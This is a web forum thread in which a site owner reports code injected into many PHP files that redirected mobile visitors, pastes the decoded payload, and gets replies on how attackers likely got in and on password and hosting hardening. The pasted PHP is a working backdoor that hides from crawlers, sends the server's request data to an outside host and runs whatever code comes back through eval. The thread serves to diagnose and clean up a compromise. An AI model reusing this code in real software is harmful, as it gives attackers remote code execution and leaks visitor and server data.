at one of our sites i found a bad code at the top of index.php, main.php files of nearly all scripts (calendars,gallery scripts, file uploding forms .. etc.)
i wrote this bad code to the below, and this code was redirecting especially mobile viewers to a porn site.
I cleaned those codes from about 25 files but i am in doubt whether it comes back again or not.
Most of our scripts seem to be updated to latest versions, What can i do for better security, we dont want this to happen again.
what can you offer and what is the reason of that hacking ? please give me info ..
i decoded the bad code from an online decoding source. it is as follows :
maybe it helps for answering my questions above better.
I wonder if there may be any other file at the server that puts this bad code to our php files., if yes how can i find it ?
the site is a big site.
Thanks
decoded codes :
PHP Code:
error_reporting(0);
if(!$hkuh_b) { global $hkuh_b; $hkuh_b = 1;
$bkljg=$_SERVER["HTTP_USER_AGENT"];
$ghfju = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "bot", "spid", "Lynx", "PHP", "WordPress". "integromedb","SISTRIX","Aggregator", "findlinks", "Xenu", "BacklinkCrawler", "Scheduler", "mod_pagespeed", "Index", "ahoo", "Tapatalk", "PubSub", "RSS");
if( !($_GET['df'] === "2") and !($_POST['dl'] === "2" ) and !(@$_COOKIE['statsle']) and ((preg_match("/" . implode("|", $ghfju) . "/i", $bkljg)) or (@$_COOKIE['statsl']) or (!$bkljg) or ($_SERVER['HTTP_REFERER'] === "http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']) or ($_SERVER['REMOTE_ADDR'] === "127.0.0.1") or ($_SERVER['REMOTE_ADDR'] === $_SERVER['SERVER_ADDR']) or ($_GET['df'] === "1") or ($_POST['dl'] === "1" ) or (ini_get("safe_mode")) or (!function_exists('file_get_contents')) or (!function_exists('ob_start'))))
{}
else
{
foreach($_SERVER as $ndbv => $cbcd) { $data_nfdh.= "&REM_".$ndbv."='".base64_encode($cbcd)."'";}
$context_jhkb = stream_context_create(
array('http'=>array(
'timeout' => '15',
'header' => "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.9) Gecko/20100101 Firefox/10.0.9_ Iceweasel/10.0.9\r\nConnection: Close\r\n\r\n",
'method' => 'POST',
'content' => "REM_REM='1'".$data_nfdh
)));
$vkfu=file_get_contents("http://galeria.banaszek.info/plugins/flvplayer/session.php?id", false ,$context_jhkb);
if($vkfu) { @eval($vkfu); } else {ob_start(); if(!@headers_sent()) { @setcookie("statsl","2",time()+172800); } else { echo "<script>document.cookie='statsl=2; path=/; expires=".date('D, d-M-Y H:i:s',time()+172800)." GMT;';</script>"; } ;};
}
}
The fact that it's base64-encoded PHP code has nothing to do with how it got onto your site, that's just the payload the attacker left once they found a way in. They may have hacked your site login or FTP password (so it's probably time to change all passwords to longer, more difficult to hack passwords, and make sure all access to the site's control panel and FTP (or really SFTP) are via SSL). If you're on a shared hosting plan, it may have come through another hacked account on that same host, or even someone who registered an account there so they could access other accounts' directories on a poorly configured host (so you might want to consider upgrading to a VPS plan, or even move to a different host. There may be a security hole in one of your site's pages that allowed them to drop in a script to modify your PHP files (and then perhaps delete itself), which might require a detailed security analysis to find (and make sure all your 3rd-part apps have the latest security patches!).
Please give us a simple answer, so that we don't have to think, because if we think, we might find answers that don't fit the way we want the world to be." ~ from Nation, by Terry Pratchett
"But the main reason that any programmer learning any new language thinks the new language is SO much better than the old one is because he’s a better programmer now!" ~ http://www.oreillynet.com/ruby/blog/...ck_to_p_1.html
Hey weed, thanks for the links. I've not seen this site before and it shall give me some reading to do.
Sadly, nobody codes for anyone on this forum. People taste your dishes and tell you what is missing, but they don't cook for you. ~anoopmail I'd rather be a comma, then a full stop. User Authentication in PHP with MySQLi - Don't forget to mark threads resolved - MySQL(i) warning
i decoded the bad code from an online decoding source. it is as follows :
Incidentally there was no need to go to an "online decoding source" to decode the base64. The decoding mechanism is built right into PHP and was used by what you posted: base64_decode.
Reply With Quote
Originally Posted by ugurpc
Bookmarks